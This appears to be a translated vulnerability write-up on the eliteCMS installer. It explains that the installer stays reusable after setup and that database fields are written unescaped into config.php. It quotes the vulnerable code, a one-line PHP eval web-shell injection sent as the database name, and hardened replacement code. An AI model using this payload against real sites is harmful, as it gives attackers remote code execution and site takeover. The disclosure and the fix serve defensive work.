The eliteCMS installer is not locked after installation completes, so an attacker can re-run the installation simply by visiting the installer URL.

Another vulnerability: the installer can write a one-line PHP backdoor ("一句话" shell) straight into admin/includes/config.php.

Let's look at the code:
....
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated verbatim into PHP source, with no escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
    ...
Now look at the code that fills the session:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation at all.

If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor is written into /admin/includes/config.php.
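As an added example (not eliteCMS's own code), this is how the step-4 config writer could be hardened in PHP 7+: the installer refuses to run once a lock file exists, DB host/name/user are checked against a whitelist before use, and every value is emitted through var_export(), so the payload quoted above becomes an inert string literal instead of PHP code. The lock-file path and the function names are assumptions, not eliteCMS identifiers.

```php
<?php
// Added hardening example, not eliteCMS's own code. Lock-file path and
// function names are hypothetical. Requires PHP 7 or newer.

// Fix 1: an installer that has completed must refuse to run again.
define('INSTALL_LOCK', __DIR__ . '/install.lock');
if (file_exists(INSTALL_LOCK)) {
    http_response_code(403);
    exit('Installation already completed; installer is locked.');
}

// Fix 2a: validate the values before they are ever written to config.php.
// Database and account names: a conservative identifier whitelist.
function valid_identifier(string $v): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_]{1,64}$/', $v);
}
// Host: hostname or IPv4 literal with an optional :port.
function valid_host(string $v): bool
{
    return (bool) preg_match('/^[A-Za-z0-9.\-]{1,253}(:[0-9]{1,5})?$/', $v);
}

// Fix 2b: emit each value with var_export(), so quotes, newlines or a PHP
// close tag inside the value become an escaped string literal rather than
// code (needed for the password, which cannot be restricted to a whitelist).
function build_config(array $cfg): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= 'define(' . var_export($key, true) . ', '
              . var_export((string) $cfg[$key], true) . ");\n";
    }
    return $out;
}

$cfg = [];
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
    $cfg[$key] = (string) ($_POST[$key] ?? '');
}
if (!valid_host($cfg['DB_SERVER']) || !valid_identifier($cfg['DB_NAME'])
    || !valid_identifier($cfg['DB_USER'])) {
    http_response_code(400);
    exit('Invalid database settings.');
}
// Write config.php under an exclusive lock, then lock the installer itself.
file_put_contents(__DIR__ . '/../admin/includes/config.php', build_config($cfg), LOCK_EX);
touch(INSTALL_LOCK);
```

With this in place the DB_NAME value quoted above fails valid_identifier() and is rejected with a 400; even a value that passed the whitelist could not break out of the define() call, because var_export() escapes it as a single-quoted literal.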